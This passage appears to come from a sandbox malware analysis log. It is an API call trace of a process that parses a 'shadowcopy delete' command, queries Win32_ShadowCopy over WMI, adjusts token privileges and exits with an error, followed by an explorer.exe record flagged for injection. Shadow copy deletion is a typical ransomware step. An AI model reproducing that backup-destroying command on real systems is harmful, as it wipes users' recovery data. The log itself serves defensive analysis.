(_Block=0x109b00) [0180.297] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x43007c0006 | out: _String=0x0, _Context=0x43007c0006) returned="from" [0180.297] lstrlenW (lpString="FROM") returned 4 [0180.297] lstrlenW (lpString="from") returned 4 [0180.297] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0180.297] malloc (_Size=0x18) returned 0x109b00 [0180.297] free (_Block=0x109a80) [0180.297] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x44007c0006 | out: _String=0x0, _Context=0x44007c0006) returned="Win32_ShadowCopy" [0180.297] malloc (_Size=0x18) returned 0x109a80 [0180.297] free (_Block=0x109b00) [0180.297] free (_Block=0x10ce60) [0180.297] free (_Block=0x109a80) [0180.297] lstrlenW (lpString="SET") returned 3 [0180.297] lstrlenW (lpString="delete") returned 6 [0180.297] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0180.297] lstrlenW (lpString="CREATE") returned 6 [0180.297] lstrlenW (lpString="delete") returned 6 [0180.297] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0180.297] free (_Block=0x1099c0) [0180.297] malloc (_Size=0x8) returned 0x10ce60 [0180.297] lstrlenW (lpString="GET") returned 3 [0180.297] lstrlenW (lpString="delete") returned 6 [0180.297] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0180.297] lstrlenW (lpString="LIST") returned 4 [0180.297] lstrlenW (lpString="delete") returned 6 [0180.297] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0180.297] lstrlenW (lpString="ASSOC") returned 5 [0180.297] lstrlenW (lpString="delete") returned 6 [0180.297] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0180.297] WbemLocator:IUnknown:AddRef (This=0x1b91390) returned 0x3 [0180.297] free (_Block=0x2bdfb0) [0180.298] lstrlenW (lpString="") returned 0 [0180.298] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.298] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0180.298] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.298] malloc (_Size=0x14) returned 0x1099c0 [0180.298] lstrlenW (lpString="XDUWTFONO") returned 9 [0180.298] GetCurrentThreadId () returned 0x514 [0180.298] GetCurrentProcess () returned 0xffffffffffffffff [0180.298] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1af4e0 | out: TokenHandle=0x1af4e0*=0x27c) returned 1 [0180.298] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1af4d8 | out: TokenInformation=0x0, ReturnLength=0x1af4d8) returned 0 [0180.298] malloc (_Size=0x40) returned 0x10ce80 [0180.298] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x10ce80, TokenInformationLength=0x40, ReturnLength=0x1af4d8 | out: TokenInformation=0x10ce80, ReturnLength=0x1af4d8) returned 1 [0180.298] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x10ce80*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=524176992, Attributes=0x9664))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0180.298] free (_Block=0x10ce80) [0180.298] CloseHandle (hObject=0x27c) returned 1 [0180.298] lstrlenW (lpString="GET") returned 3 [0180.299] lstrlenW (lpString="delete") returned 6 [0180.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0180.299] lstrlenW (lpString="LIST") returned 4 [0180.299] lstrlenW (lpString="delete") returned 6 [0180.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0180.299] lstrlenW (lpString="SET") returned 3 [0180.299] lstrlenW (lpString="delete") returned 6 [0180.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0180.299] lstrlenW (lpString="CALL") returned 4 [0180.299] lstrlenW (lpString="delete") returned 6 [0180.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0180.299] lstrlenW (lpString="ASSOC") returned 5 [0180.299] lstrlenW (lpString="delete") returned 6 [0180.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0180.299] lstrlenW (lpString="CREATE") returned 6 [0180.299] lstrlenW (lpString="delete") returned 6 [0180.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0180.299] lstrlenW (lpString="DELETE") returned 6 [0180.299] lstrlenW (lpString="delete") returned 6 [0180.299] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0180.302] malloc (_Size=0x18) returned 0x109a80 [0180.302] lstrlenA (lpString="") returned 0 [0180.302] malloc (_Size=0x2) returned 0x2bdfb0 [0180.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff59314c, cbMultiByte=-1, lpWideCharStr=0x2bdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.302] free (_Block=0x2bdfb0) [0180.302] malloc (_Size=0x18) returned 0x109b00 [0180.302] lstrlenA (lpString="") returned 0 [0180.302] malloc (_Size=0x2) returned 0x2bdfb0 [0180.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff59314c, cbMultiByte=-1, lpWideCharStr=0x2bdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.302] free (_Block=0x2bdfb0) [0180.302] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0180.302] malloc (_Size=0x3e) returned 0x10ce80 [0180.302] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0180.302] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffa280 | out: _String="Select", _Context=0xffffffffffffa280) returned="Select" [0180.302] malloc (_Size=0x18) returned 0x109ba0 [0180.302] free (_Block=0x109b00) [0180.302] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x48006c0005 | out: _String=0x0, _Context=0x48006c0005) returned="*" [0180.303] lstrlenW (lpString="FROM") returned 4 [0180.303] lstrlenW (lpString="*") returned 1 [0180.303] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0180.303] malloc (_Size=0x18) returned 0x109b00 [0180.303] free (_Block=0x109ba0) [0180.303] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x49006c0005 | out: _String=0x0, _Context=0x49006c0005) returned="from" [0180.303] lstrlenW (lpString="FROM") returned 4 [0180.303] lstrlenW (lpString="from") returned 4 [0180.303] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0180.303] malloc (_Size=0x18) returned 0x109ba0 [0180.303] free (_Block=0x109b00) [0180.303] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x4a006c0005 | out: _String=0x0, _Context=0x4a006c0005) returned="Win32_ShadowCopy" [0180.303] malloc (_Size=0x18) returned 0x109b00 [0180.303] free (_Block=0x109ba0) [0180.303] free (_Block=0x10ce80) [0180.303] malloc (_Size=0x18) returned 0x109ba0 [0180.303] malloc (_Size=0x18) returned 0x109aa0 [0180.303] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0180.303] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0180.303] free (_Block=0x109a80) [0180.303] free (_Block=0x109ba0) [0180.303] ??0CHString@@QEAA@XZ () returned 0x1af450 [0180.303] GetCurrentThreadId () returned 0x514 [0180.303] malloc (_Size=0x18) returned 0x109ba0 [0180.303] malloc (_Size=0x18) returned 0x109a80 [0180.303] malloc (_Size=0x18) returned 0x109b20 [0180.303] malloc (_Size=0x18) returned 0x109b40 [0180.304] malloc (_Size=0x18) returned 0x109b60 [0180.304] SysStringLen (param_1="\\\\") returned 0x2 [0180.304] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0180.304] malloc (_Size=0x18) returned 0x109b80 [0180.304] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0180.304] SysStringLen (param_1="\\") returned 0x1 [0180.304] malloc (_Size=0x18) returned 0x10ceb0 [0180.304] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0180.304] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0180.304] free (_Block=0x109b80) [0180.304] free (_Block=0x109b60) [0180.304] free (_Block=0x109b40) [0180.304] free (_Block=0x109b20) [0180.304] free (_Block=0x109a80) [0180.304] free (_Block=0x109ba0) [0180.304] malloc (_Size=0x18) returned 0x109ba0 [0180.304] malloc (_Size=0x18) returned 0x109a80 [0180.304] malloc (_Size=0x18) returned 0x109b20 [0180.304] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1b91390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff6029d0 | out: ppNamespace=0xff6029d0*=0x1ba3c18) returned 0x0 [0180.319] free (_Block=0x109b20) [0180.319] free (_Block=0x109a80) [0180.319] free (_Block=0x109ba0) [0180.319] CoSetProxyBlanket (pProxy=0x1ba3c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0180.319] free (_Block=0x10ceb0) [0180.319] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.319] ??0CHString@@QEAA@XZ () returned 0x1af3a0 [0180.319] GetCurrentThreadId () returned 0x514 [0180.319] malloc (_Size=0x18) returned 0x109ba0 [0180.319] lstrlenA (lpString="") returned 0 [0180.319] malloc (_Size=0x2) returned 0x2bdfb0 [0180.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff59314c, cbMultiByte=-1, lpWideCharStr=0x2bdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0180.320] free (_Block=0x2bdfb0) [0180.320] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0180.320] SysStringLen (param_1="") returned 0x0 [0180.320] free (_Block=0x109ba0) [0180.320] malloc (_Size=0x18) returned 0x109ba0 [0180.320] IWbemServices:ExecQuery (in: This=0x1ba3c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x1af3a8 | out: ppEnum=0x1af3a8*=0x0) returned 0x80041014 [0180.343] free (_Block=0x109ba0) [0180.343] _CxxThrowException () [0180.344] malloc (_Size=0x20) returned 0x10d680 [0180.345] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.345] free (_Block=0x109b00) [0180.345] free (_Block=0x109aa0) [0180.345] GetCurrentThreadId () returned 0x514 [0180.345] ??0CHString@@QEAA@PEBG@Z () returned 0x1af588 [0180.345] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1af588 [0180.345] ??0CHString@@QEAA@XZ () returned 0x1af320 [0180.345] malloc (_Size=0x18) returned 0x109aa0 [0180.345] malloc (_Size=0x18) returned 0x109b00 [0180.345] SysStringLen (param_1="") returned 0x0 [0180.345] free (_Block=0x109aa0) [0180.345] CoCreateInstance (in: rclsid=0xff5973c0*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff597390*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xff6029f8 | out: ppv=0xff6029f8*=0x1b91450) returned 0x0 [0180.348] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x1b91450, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x1af318 | out: MessageText=0x1af318*="Initialization failure\r\n") returned 0x0 [0180.350] free (_Block=0x109b00) [0180.350] malloc (_Size=0x18) returned 0x109b00 [0180.350] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x1b91450, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x1af310 | out: MessageText=0x1af310*="WMI") returned 0x0 [0180.352] malloc (_Size=0x18) returned 0x109aa0 [0180.352] lstrlenW (lpString="WMI") returned 3 [0180.352] lstrlenW (lpString="Wbem") returned 4 [0180.352] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0180.352] lstrlenW (lpString="WMI") returned 3 [0180.352] lstrlenW (lpString="WMI") returned 3 [0180.352] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0180.352] WbemStatusCodeText:IUnknown:Release (This=0x1b91450) returned 0x0 [0180.352] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.352] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x1aeb80, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0180.352] FormatMessageW (in: dwFlags=0x2500, lpSource=0x1aeb80, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1aeb50, nSize=0x0, Arguments=0x1aeb58 | out: lpBuffer="\"") returned 0x2e [0180.352] malloc (_Size=0x18) returned 0x109ba0 [0180.352] LocalFree (hMem=0x22e950) returned 0x0 [0180.352] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0180.352] malloc (_Size=0x2f) returned 0x108600 [0180.352] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x108600, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0180.352] fprintf (in: _File=0x7fefeed2ae0, _Format="%s" | out: _File=0x7fefeed2ae0) returned 46 [0180.354] fflush (in: _File=0x7fefeed2ae0 | out: _File=0x7fefeed2ae0) returned 0 [0180.354] free (_Block=0x108600) [0180.354] free (_Block=0x109ba0) [0180.354] free (_Block=0x109aa0) [0180.354] free (_Block=0x109b00) [0180.354] ??1CHString@@QEAA@XZ () returned 0xc3e4d01 [0180.354] ??0CHString@@QEAA@PEBG@Z () returned 0x1af580 [0180.354] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1af580 [0180.354] GetCurrentThreadId () returned 0x514 [0180.354] ??1CHString@@QEAA@XZ () returned 0xc3e4d01 [0180.354] WbemLocator:IUnknown:Release (This=0x1ba3c18) returned 0x0 [0180.356] ?Empty@CHString@@QEAAXXZ () returned 0x7fef81f482c [0180.356] free (_Block=0x10d680) [0180.356] _kbhit () returned 0x0 [0180.358] free (_Block=0x10ce60) [0180.358] free (_Block=0x1099a0) [0180.358] free (_Block=0x109980) [0180.359] free (_Block=0x109960) [0180.359] free (_Block=0x109440) [0180.359] free (_Block=0x1070a0) [0180.359] free (_Block=0x109a40) [0180.359] free (_Block=0x1085c0) [0180.359] free (_Block=0x109ac0) [0180.359] free (_Block=0x107100) [0180.359] free (_Block=0x109a60) [0180.359] free (_Block=0x109ae0) [0180.359] free (_Block=0x107150) [0180.359] free (_Block=0x106e60) [0180.359] free (_Block=0x10ce30) [0180.359] ?Empty@CHString@@QEAAXXZ () returned 0x7fef81f482c [0180.359] free (_Block=0x1070d0) [0180.359] free (_Block=0x1099e0) [0180.359] free (_Block=0x109a00) [0180.359] free (_Block=0x107f00) [0180.359] free (_Block=0x107f50) [0180.359] free (_Block=0x1069e0) [0180.359] free (_Block=0x1099c0) [0180.359] free (_Block=0x106a80) [0180.359] free (_Block=0x106e40) [0180.359] free (_Block=0x108040) [0180.360] free (_Block=0x106e20) [0180.360] free (_Block=0x108000) [0180.360] free (_Block=0x106dc0) [0180.360] free (_Block=0x106de0) [0180.360] free (_Block=0x106ca0) [0180.360] free (_Block=0x106cc0) [0180.360] free (_Block=0x106c40) [0180.360] free (_Block=0x106c60) [0180.360] free (_Block=0x106d00) [0180.360] free (_Block=0x106d20) [0180.360] free (_Block=0x106d60) [0180.360] free (_Block=0x106d80) [0180.360] free (_Block=0x106b80) [0180.360] free (_Block=0x106ba0) [0180.360] free (_Block=0x106b20) [0180.361] free (_Block=0x106b40) [0180.361] free (_Block=0x106be0) [0180.361] free (_Block=0x106c00) [0180.361] free (_Block=0x106ac0) [0180.361] free (_Block=0x106ae0) [0180.361] free (_Block=0x106a30) [0180.361] free (_Block=0x107fa0) [0180.361] free (_Block=0x106eb0) [0180.361] WbemLocator:IUnknown:Release (This=0x1b91390) returned 0x2 [0180.361] WbemLocator:IUnknown:Release (This=0x1ba3b28) returned 0x0 [0180.366] WbemLocator:IUnknown:Release (This=0x1ba3a98) returned 0x0 [0180.366] WbemLocator:IUnknown:Release (This=0x1b91390) returned 0x1 [0180.366] ?Empty@CHString@@QEAAXXZ () returned 0x7fef81f482c [0180.366] WbemLocator:IUnknown:Release (This=0x1b91390) returned 0x0 [0180.366] free (_Block=0x1098e0) [0180.366] free (_Block=0x109900) [0180.366] free (_Block=0x108540) [0180.366] free (_Block=0x109920) [0180.367] free (_Block=0x109940) [0180.367] free (_Block=0x108580) [0180.367] free (_Block=0x109760) [0180.367] free (_Block=0x109780) [0180.367] free (_Block=0x1083c0) [0180.367] free (_Block=0x1097a0) [0180.367] free (_Block=0x1097c0) [0180.367] free (_Block=0x108400) [0180.367] free (_Block=0x1096e0) [0180.367] free (_Block=0x109700) [0180.367] free (_Block=0x108340) [0180.367] free (_Block=0x109720) [0180.367] free (_Block=0x109740) [0180.367] free (_Block=0x108380) [0180.367] free (_Block=0x109860) [0180.367] free (_Block=0x109880) [0180.367] free (_Block=0x1084c0) [0180.367] free (_Block=0x1098a0) [0180.367] free (_Block=0x1098c0) [0180.367] free (_Block=0x108500) [0180.367] free (_Block=0x109660) [0180.367] free (_Block=0x109680) [0180.367] free (_Block=0x1082c0) [0180.367] free (_Block=0x1096a0) [0180.367] free (_Block=0x1096c0) [0180.367] free (_Block=0x108300) [0180.367] free (_Block=0x1097e0) [0180.368] free (_Block=0x109800) [0180.368] free (_Block=0x108440) [0180.368] free (_Block=0x109820) [0180.368] free (_Block=0x109840) [0180.368] free (_Block=0x108480) [0180.368] free (_Block=0x1095a0) [0180.368] free (_Block=0x1095c0) [0180.368] free (_Block=0x108200) [0180.368] free (_Block=0x109460) [0180.368] free (_Block=0x109480) [0180.368] free (_Block=0x1080c0) [0180.368] free (_Block=0x109420) [0180.368] free (_Block=0x109400) [0180.368] free (_Block=0x108080) [0180.368] free (_Block=0x1094e0) [0180.368] free (_Block=0x109500) [0180.368] free (_Block=0x108140) [0180.368] free (_Block=0x1095e0) [0180.368] free (_Block=0x109600) [0180.368] free (_Block=0x108240) [0180.368] free (_Block=0x1094a0) [0180.368] free (_Block=0x1094c0) [0180.368] free (_Block=0x108100) [0180.368] free (_Block=0x109520) [0180.368] free (_Block=0x109540) [0180.368] free (_Block=0x108180) [0180.368] free (_Block=0x109560) [0180.368] free (_Block=0x109580) [0180.369] free (_Block=0x1081c0) [0180.369] free (_Block=0x109620) [0180.369] free (_Block=0x109640) [0180.369] free (_Block=0x108280) [0180.369] CoUninitialize () [0180.402] exit (_Code=-2147217388) [0180.402] free (_Block=0x10cd30) [0180.402] free (_Block=0x107ec0) [0180.402] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.402] free (_Block=0x106f40) [0180.402] free (_Block=0x106aa0) [0180.402] free (_Block=0x107e80) [0180.402] free (_Block=0x107e40) [0180.402] free (_Block=0x107df0) [0180.402] free (_Block=0x107db0) [0180.402] free (_Block=0x107d50) [0180.402] free (_Block=0x105a80) [0180.402] free (_Block=0x105a40) [0180.402] ??1CHString@@QEAA@XZ () returned 0x7fef81f482c [0180.403] free (_Block=0x109a20) Thread: id = 352 os_tid = 0x594 Thread: id = 353 os_tid = 0x5b4 Thread: id = 354 os_tid = 0x630 Thread: id = 355 os_tid = 0x610 Thread: id = 356 os_tid = 0x634 Process: id = "19" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x553b6000" os_pid = "0x428" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "13" os_parent_pid = "0x34c" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e213" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 358 os_tid = 0x544 Thread: id = 359 os_tid = 0x6fc Thread: id = 360 os_tid = 0x690 Thread: id = 361 os_tid = 0x674 Thread: id = 362 os_tid = 0x65c Thread: id = 363 os_tid = 0x644 Thread: id = 364 os_tid = 0x624 Thread: id = 365 os_tid = 0x60c Thread: id = 366 os_tid = 0x608 Thread: id = 367 os_tid = 0x5fc Thread: id = 368 os_tid = 0x5e4 Thread: id = 369 os_tid = 0x5e8 Thread: id = 370 os_tid = 0x5b0 Thread: id = 371 os_tid = 0x598 Thread: id = 372 os_tid = 0x590 Thread: id = 373 os_tid = 0x588 Thread: id = 374 os_tid = 0x56c Thread: id = 375 os_tid = 0x53c Thread: id = 376 os_tid = 0x530 Thread: id = 377 os_tid = 0x500 Thread: id = 378 os_tid = 0x4fc Thread: id = 379 os_tid = 0x4f8 Thread: id = 380 os_tid = 0x4f4 Thread: id = 381 os_tid = 0x4ec Thread: id = 382 os_tid = 0x4e4 Thread: id = 383 os_tid = 0x4e0 Thread: id = 384 os_tid = 0x4d8 Thread: id = 385 os_tid = 0x4b8 Thread: id = 386 os_tid = 0x484 Thread: id = 387 os_tid = 0x480 Thread: id = 388 os_tid = 0x474 Thread: id = 389 os_tid = 0x470 Thread: id = 390 os_tid = 0x46c Thread: id = 391 os_tid = 0x434 Thread: id = 392 os_tid = 0x42c Thread: id = 393 os_tid = 0x5ac